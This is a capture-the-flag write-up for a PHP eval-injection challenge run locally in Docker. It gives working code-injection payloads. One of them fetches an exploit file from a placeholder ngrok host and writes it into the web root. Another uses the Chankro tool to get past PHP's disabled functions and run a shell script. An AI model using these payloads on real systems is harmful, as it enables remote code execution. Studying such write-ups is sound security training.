Description
We were given the source code and the Dockerfile, we can build it locally and work on it directly on our own system.
Code Review
Snipped code from: index.php (Only PHP Part !)
The 7th line of the code appears to contain an eval
function that is called within the do_calcs
function.
This function is called in line 17 of the code. Before we can examine this further, we need to check the 4th line of the code, which appears to contain a regular expression pattern.
This suggests that our PHP code must be placed within {{PHP EVAL CODE}}
in order to be evaluated properly.
Solution
Let’s try to send a simple payload 200,{{phpinfo()}}
This simple phpinfo
function is going to be executed
But if we take a look on the disabled functions list, we see a list of functions that are restricted or not available for use.
exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,pcntl_exec,expect_popen
In cases where we need to bypass disabled functions, we can use Chankro
First let’s build our payload:
python2 chankro.py --arch 64 --input shell.sh --path /var/www/html --output exploit.txt
The shell.sh content:
#!/bin/sh
/readflag > /var/www/html/flag.txt
Now that we have saved the shell, we can host it on a local web server using PHP or Python.
200,{{file_put_contents("/var/www/html/exploit.php",file_get_contents("http://XXXXXXXXX.ngrok.io/exploit.txt"),FILE_APPEND)}}
After that we can browser the file http://127.0.0.1:1337/exploit.php
Flag
We should be able to retrieve the flag easily http://127.0.0.1:1337/flag.txt